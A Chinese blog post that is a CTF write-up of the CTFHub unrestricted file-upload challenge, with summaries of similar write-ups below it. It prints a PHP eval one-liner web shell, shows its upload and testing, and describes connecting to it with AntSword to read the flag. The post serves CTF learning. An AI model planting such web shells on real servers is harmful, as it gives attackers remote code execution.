CTFHub | 无验证

已于 2023-02-25 17:00:46 修改
阅读量576 收藏 1
点赞数
分类专栏: CTF精进之路 文章标签: 安全 web安全 CTF
于 2023-02-08 16:29:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/128416994
版权

0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

无验证:

        (无)

网页显示内容

        

        

0x02 解题过程

        根据网页提示内容,这题应该和文件上传有关,并且有文件上传模块。

         

网页提示文件上传是无限制的,那么构造shell不用做任何限制,使用最简单的一句话木马应该就可以成功连接

<?php @eval($_POST['shell']); ?>    #shell为一句话连接密码

        

点击网页中的选择文件,将刚刚编写好的shell文件上传,提示上传成功

         

使用Hackbar工具提交POST请求验证刚刚上传的shell木马是否成功

shell=phpinfo();    #shell密码=phpinfo(); 连接到PHP info查看PHP相关信息

        

验证刚刚上传的shell木马成功后可以使用蚁剑连接一句话木马,点击测试连接显示连接成功

         

测试连接成功后,可以直接点击添加数据,那么蚁剑即可成功连接一句话木马

         

点击刚刚添加成功的数据

         

找了半天,发现关于flag的文件居然在html文件夹中

         

点击查看flag_205621433.php文件中的信息,发现此题flag

         

        

0x03 漏洞利用

关于文件上传漏洞的几种攻击思路:

[1].上传恶意文件:在上传文件无验证的情况下,可能存在恶意文件被上传的可能,从而导致数据安全问题

[2]. 改变文件扩展名:攻击者可以把文件扩展名改变,使文件成为可执行文件

[3].上传大量文件:攻击者可以上传大量无用文件,消耗服务器资源,造成系统反应缓慢

[4]. 融合攻击:攻击者可以把可执行文件融合到其他文件中,使得可执行文件可以被上传进行实施攻击

        

        

0x04 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFCTFHub------web-文件上传-无验证/前端验证
从零开始的网安生活
07-23 864
文章目录文件上传验证 文件上传验证 1.打开记事本写入 <?php eval($_POST['123'])?> 保存为a.txt,重命名为a.php 2.根据提示上传a.php文件 3.打开蚁剑,添加数据 4.添加成功,点开,翻找目录,在html下发现flag文件,点开即获得flag ...
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
ctfhub文件上传---无验证
x2813488062的博客
01-26 1102
解题思路 题目字面意思--无验证,即对所上传文件无任何验证 解题思路:上传木马文件--获取靶机shell--访问服务器 "shell" - 取得对服务器某种程度上操作权限 上传shell.php 一句话木马文件 <?php eval(@$_POST['cmd']); ?> eval是执行命令的函数 $_POST['cmd']是接收的数据 上传成功后拿到文件的相对路径进行访问 查看木马是否上传成功 可给cmd传递数据进行查看 木马中接收方法为POST 所有..
CTFHub-Web-文件上传
最新发布
IceCream的博客
05-01 1217
1.编写一段PHP木马脚本2.将编写好的木马进行上传3.显示上传成功了4.使用文件上传工具进行尝试5.连接成功进入文件管理6.上翻目录找到flag文件7.打开文件查看flag。
CTFHub技能书解题笔记-文件上传-无验证
qq_43006864的博客
12-29 302
打开题目 说是无验证。咋也不懂,直接打开看看。 试试直接上传一句话木马。 <?php echo "hello"; @eval($_POST['shell']);?> 直接成功,这里访问试试。 成了。然后直接蚁剑连接 进行连接。这里的url就是刚才咱们访问shell.php文件的url。连接密码就是中括号里的shell。这里可以随意更改。 然后打开蚁剑,空白处右键添加数据。 输入url和连接密码。点击测试连接。提示成功,就OK了。 ...
ctfhub 文件上传验证
m0_52432374的博客
02-18 478
ctfhub验证 解题方法: 题目名称就叫做无验证-文件上传,那么无验证–>对上传的文件没有做任何验证。所以上传木马–>获得靶机shell–>利用蚁剑在网站(服务器)中寻找flag。 1.上传yjh.php 2.得到上传文件相对路径upload/yjh.php 3.构造payload: http://challenge-f31f46b88104a514.sandbox.ctfhub.com:10080/upload/yjh.php 4.用蚁剑连接,找到flag文件 ...
CTFHUB-技能树-Web题-文件上传(无验证,JS前端验证,前端验证
Static______的博客
04-15 933
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。】后,弹出的【另存为】对话框,在【文件名】一栏中输入【.htaccess】,【保存类型】选择【所有文件】,然后选择要保存的路径,单击【保存】按钮!上传后显示相对路径,访问此路径,发现可以访问,且木马执行成功。此时,再上传一句话木马,并把文件改为png格式。
ctf:CTF评论|网络
04-19
周大福CTF评论|网络
3.18号日报,ctfhubweb文件上传漏洞题目解法
03-18
文件上传漏洞
CtfHub-wp(web
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
CTFHub日记,ctfhub文件上传验证
dqx1223的博客
01-09 1988
ctfhub文件上传—无验证
CTFHub笔记之WEB文件上传:无验证、前端验证、文件头检查
weixin_48799157的博客
03-22 2600
小白一个,如有错误请指正! 一、无验证 我们这次来到了文件上传模块了,这是一个无验证文件上传,那我们直接上传一个一句话木马即可。 代码: <?php @eval($_REQUEST["shell"]); ?> 1.我们在桌面创建一个shell.txt文件,输入代码后将后缀改成.php,然后将文件上传。 2.在这里我们得知上传的路径是: http://challenge-620c59fde44f34b7.sandbox.ctfhub.com:10800...
CTFHub_技能树_Web文件上传——“无验证”_PHP的一句话木马
Ho1aAs‘s Blog
07-23 691
文章目录使用工具解题步骤Ⅰ、编写ShellⅡ、蚁剑访问根目录完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 中国蚁剑 解题步骤 本题需要上传shell后从网页文件夹获取到FLAG Ⅰ、编写Shell #PHP <?php echo "PHP Loaded"; //便于确认是否成功上传 eval(@$_POST['a']); ?> 验证是否成功上传 Ⅱ、蚁剑访问根目录 添加数据 URL地址填写服务器根目录中shell的地
ctfhub 基础认证
m0_63711447的博客
05-25 2598
1、打开题目环境 2、点击click跳出来一个登录弹窗,随便输入用户名和密码登录试试,没有返回任何有用信息 3、查看附件,得到一堆密码,应该是要直接爆破 4、点击click抓包后发送到repeater模块,重新发包得到"Do u know admin"的信息,猜测用户名即为admin 4、输入用户名和密码后抓包,看到一串base64加密过的字符 丢到解码器里解码,发现是我刚输进去的用户名和密码,中间用冒号隔开了(冒号划重点! 6、把包发送到爆破模块,给刚刚的base64密
CTFHub-基础认证
Have_a_great_day的博客
09-06 768
CTFHub-基础认证之夺旗流程
CTFHub | 基础认证
尼泊罗河伯的博客
10-01 4658
这题有一个题目附件10_million_password_list_top_100 内容是1000 万密码列表的前 100 个,那么这题应该和暴力破解有关。在这之前,我先使用了暴力破解工具进行尝试,但是密码都试遍了也没成功。
CTFHub 文件上传
WXY17387209358的博客
02-04 803
ctfhub文件上传无限制
CTFHUB-文件上传
m0_64180167的博客
12-25 1228
注意要改名字 我在这出现了问题是我没改文件名字 一直上传失败 于是我又在后缀上加.php才上传成功。发现失败了 试错后发现 我们一定要把上传文件的后缀名改为。于是我们了解到i我们可以运用一句话木马 进行漏洞上传。我使用kali 在桌面新建立一个文件 输入该代码保存。注意 添加的不只是地址栏的URL 还要加上相对路径。发现可以了于是我们直接进入后台 发现flag。文件上传 并且提示我们是无限制的。出现了路径 于是我们打开中国蚁剑。打开我们安装蚁剑的文件夹。于是我们尝试直接上传。
ctfhub请求申请
10-09
要申请CTFHub,你可以按照以下步骤进行: 1. 访问CTFHub官方网站(https://www.ctfhub.com/)。 2. 点击网站上的注册按钮,进入注册页面。 3. 在注册页面填写所需的个人信息,包括用户名、密码和电子邮件地址。 4. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值